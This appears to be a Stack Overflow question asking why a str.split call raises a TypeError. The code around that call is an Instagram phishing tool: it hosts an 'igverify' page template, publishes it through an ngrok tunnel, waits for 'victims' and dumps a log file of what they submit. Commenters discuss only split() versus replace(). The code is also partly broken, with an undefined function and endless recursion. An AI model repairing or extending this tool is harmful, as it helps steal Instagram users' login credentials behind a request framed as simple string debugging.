# Str Error TypeError: 'str' object cannot be interpreted as an integer

Tags: python, keyerror

I am making a server in python using below code

```
import requests
import os
try:
    from colorama import Fore,Back,Style
except Exception:
    os.system('pip install colorama')
    clr()
from colorama import Fore,Back,Style
try:
    import fake_useragent
except Exception:
    os.system('pip install fake_useragent')
    clr()
try:
    from stem.control import Controller
except Exception:
    os.system('pip install stem')
try:
    from pyngrok import ngrok 
except Exception:
    os.system('pip install pyngrok')    
    clr()
try:
    from pyngrok import ngrok 
except Exception:
    os.system("pip install pyngok")
    clr()
B = Style.BRIGHT+Fore.BLUE
G = Style.BRIGHT+Fore.GREEN
C = Style.BRIGHT+Fore.CYAN
Y = Style.BRIGHT+Fore.YELLOW
M = Style.BRIGHT+Fore.MAGENTA
W = Style.BRIGHT+Fore.WHITE
R = Style.BRIGHT+Fore.RED
import subprocess
def printInfo(str):
    print(f"{Fore.MAGENTA}IgFreak , Slick Instagram brute force command line tool. Copyright (C) 2021, T-Dynamos Ansh Dadwal\n .")
    os.system(f"dat=$(date) && echo {G}[{W}✓{G}] {C}Started {str} on {G}$dat")
def phish(template):
    printInfo("Phisher ")
    print()
    print(f"""

    {C} Template : {G} {template}
    {C} Server   : {G} Ngrok
       {C} Port     : {G} 6666
    
    {B} STARTING SERVERS\n """)
    link = startServicea(template+"/")
    
    #link =  str(link).split('NgrokTunnel: "',"")
    print(f"{G} LINK = {Y} {link}")
    print(f"{G} LINK STATUS CODE = {W}[{G}{requests.get(link).status_code}{W}] ")
    print()
    print(f"{B}[{G}>{B}]{W} Wating for victims ...")
    def check():
        if os.path.exists("log.txt"):
            os.system('cat log.txt && rm log.txt')
            return check()
        else:
            return check ()

def startServicea(folder):
    import os
    os.chdir(folder)
    import http.server , ssl
    server_adress = ("localhost",6666)
    httpd = http.server.HTTPServer(server_adress,http.server.SimpleHTTPRequestHandler)
    httpd.socket = ssl.wrap_socket(httpd.socket,


    ssl_version=ssl.PROTOCOL_TLS)
    import _thread
    def main():
        httpd.serve_forever()
    _thread.start_new_thread(main,())
    link = subprocess.check_output('''python3 -c "from pyngrok import ngrok ; print(ngrok.connect(6666,'http'))" > ok.txt && clear && cat ok.txt''',shell=True)

    link  = link.split('NgrokTunnel :"',' ')
    
    return link
phish("igverify")
```

*And getting the following error*

```
Traceback (most recent call last):
  File "/storage/emulated/0/Python/file.py", line 82, in <module>
    phish("igverify")
  File "/storage/emulated/0/Python/file.py", line 49, in phish
    link = startServicea(template+"/")
  File "/storage/emulated/0/Python/file.py", line 79, in startServicea
    link  = link.split('NgrokTunnel :"',' ')
TypeError: 'str' object cannot be interpreted as an integer
```

I tried subprocess method but it didn't worked error is in string. Iwant
This

> NgrokTunnel: "http://af68-2402-3a80-1fc0-fc71-55fe-7852-7a68-cc7e.ngrok.io" -> "http://localhost:6666"

To this

> http://af68-2402-3a80-1fc0-fc71-55fe-7852-7a68-cc7e.ngrok.io
> Please help me fix

Comment: What do you expect `link.split('NgrokTunnel :"',' ')` to do? The second argument to `.split()` should be an integer.

Comment: Just want a link and split extra

Comment: This output " NgrokTunnel: "http://af68-2402-3a80-1fc0-fc71-55fe-7852-7a68-cc7e.ngrok.io" -> "http://localhost:6666" to a link

Comment: I still have no idea what you mean, but `.split()` doesn't accept multiple string arguments.

Comment: seconding @Selcuk here... it would be most helpful to hear exactly what you need from the split() call --- independent from the larger goal of your code.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Comment: I intended to use replace()